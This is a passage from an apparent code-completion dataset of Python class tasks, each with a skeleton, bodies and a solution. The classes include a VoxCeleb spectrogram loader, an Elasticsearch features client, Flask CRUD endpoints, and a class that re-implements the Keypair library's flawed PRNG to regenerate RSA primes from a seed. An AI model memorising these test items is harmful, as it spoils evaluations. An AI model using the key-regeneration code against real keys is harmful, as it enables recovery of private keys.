Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "revision_id": "eabdb6ca44cb8f44f0cfb2d94561c9d4de9bb413", "skeleton": "<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. 
If false, only the first file in the directory will be used.\"\"\"\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n", "source": "the_stack_v2_python_sparse", "source_path": "cmfpy/datasets/vox_celeb.py", "source_repo": "degleris1/cmfpy", "split": "test", "star_events_count": 1} {"blob_id": "092fcb63eadda58ea620701802e49bfe0340abbb", "bodies": ["__path = '/_features'\n__query: t.Dict[str, t.Any] = {}\nif error_trace is not None:\n __query['error_trace'] = error_trace\nif filter_path is not None:\n __query['filter_path'] = filter_path\nif human is not None:\n __query['human'] = human\nif pretty is not None:\n __query['pretty'] = pretty\n__headers = {'accept': 'application/json'}\nreturn await self.perform_request('GET', __path, params=__query, headers=__headers)", "__path = '/_features/_reset'\n__query: t.Dict[str, t.Any] = {}\nif error_trace is not None:\n __query['error_trace'] = error_trace\nif filter_path is not None:\n __query['filter_path'] = filter_path\nif human is not None:\n __query['human'] = human\nif pretty is not None:\n __query['pretty'] = pretty\n__headers = {'accept': 'application/json'}\nreturn await self.perform_request('POST', __path, params=__query, headers=__headers)"], "bodies_text": "<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n 
__query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "FeaturesClient", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-generic-cla"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000360", "length_bytes": 3309, "license_type": "permissive", "methods": [{"docstring": "Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_", "name": "get_features", "signature": "async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]"}, {"docstring": "Resets the internal state of features, usually by deleting system indices ``_", "name": "reset_features", "signature": "async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004846", "prompt": "Implement the Python class `FeaturesClient` described below.\n\nClass description:\nImplement the FeaturesClient 
class.\n\nMethod signatures and docstrings:\n- async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\n- async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Resets the internal state of features, usually by deleting system indices ``_", "prompted_full_text": "Implement the Python class `FeaturesClient` described below.\n\nClass description:\nImplement the FeaturesClient class.\n\nMethod signatures and docstrings:\n- async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\n- async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Resets the internal state of features, usually by deleting system indices ``_\n\n<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "revision_id": "915bbd784831ccb84e1559af0f829736652d2e78", "skeleton": "<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, 
filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FeaturesClient:\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n", "source": "the_stack_v2_python_sparse", "source_path": "elasticsearch/_async/client/features.py", "source_repo": "elastic/elasticsearch-py", "split": "test", "star_events_count": 3845} {"blob_id": "ca3e6c50ee6c12dfed3588318923f3633bf9dc9a", "bodies": ["try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.read(id)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs", "try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.update(id, **api.payload)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\nexcept EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. 
' + str(err))\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs", "try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.delete(id)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs"], "bodies_text": "<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ObservacionCyTG", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. 
' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000361", "length_bytes": 18120, "license_type": "no_license", "methods": [{"docstring": "To fetch an observation (CyTG (resultados))", "name": "get", "signature": "def get(self, id)"}, {"docstring": "To update an observation (CyTG (resultados))", "name": "put", "signature": "def put(self, id)"}, {"docstring": "To delete an observation (CyTG (resultados))", "name": "delete", "signature": "def delete(self, id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001264", "prompt": "Implement the Python class `ObservacionCyTG` described below.\n\nClass description:\nImplement the ObservacionCyTG class.\n\nMethod signatures and docstrings:\n- def get(self, id): To fetch an observation (CyTG (resultados))\n- def put(self, id): To update an observation (CyTG (resultados))\n- def delete(self, id): To delete an observation (CyTG (resultados))", "prompted_full_text": "Implement the Python class `ObservacionCyTG` described below.\n\nClass description:\nImplement the ObservacionCyTG class.\n\nMethod signatures and docstrings:\n- def get(self, id): To fetch an observation (CyTG (resultados))\n- def put(self, id): To update an observation (CyTG (resultados))\n- def delete(self, id): To delete an observation (CyTG (resultados))\n\n<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. 
' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "revision_id": "e00610fac26ef3ca078fd037c0649b70fa0e9a09", "skeleton": "<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ObservacionCyTG:\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. 
' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n", "source": "the_stack_v2_python_sparse", "source_path": "DOS/soa/service/genl/endpoints/observaciones_ires_cytg.py", "source_repo": "Telematica/knight-rider", "split": "test", "star_events_count": 1} {"blob_id": "37cec75c0862a16454ff11d73a081aa59cc4bd6a", "bodies": ["t = hashlib.sha1(seed).digest()\nkey = hashlib.sha1(t).digest()\nself.orig_key = key\nseed = hashlib.sha1(key).digest()\nself.key = key[:16]\nself.seed = seed[:16]", "p_size_bytes = p_size_bits // 8\nwhile True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p", "p_size_bits = bits // 2\np = self.generate_prime(p_size_bits)\nq = self.generate_prime(p_size_bits)\nwhile True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)"], "bodies_text": "<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "class_docstring": "Class for generating Keypair modulus for a given seed and bit size.", "class_name": "Generator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def 
__init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000362", "length_bytes": 3434, "license_type": "permissive", "methods": [{"docstring": "Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.", "name": "__init__", "signature": "def __init__(self, seed: bytes)"}, {"docstring": "Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.", "name": "generate_prime", "signature": "def generate_prime(self, p_size_bits: int) -> int"}, {"docstring": "Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.", "name": "generate_key", "signature": "def generate_key(self, bits: int) -> tuple[int, int]"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002538", "prompt": "Implement the Python class `Generator` described below.\n\nClass description:\nClass for generating Keypair modulus for a given seed and bit size.\n\nMethod signatures and docstrings:\n- def __init__(self, seed: bytes): Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\n- def generate_prime(self, 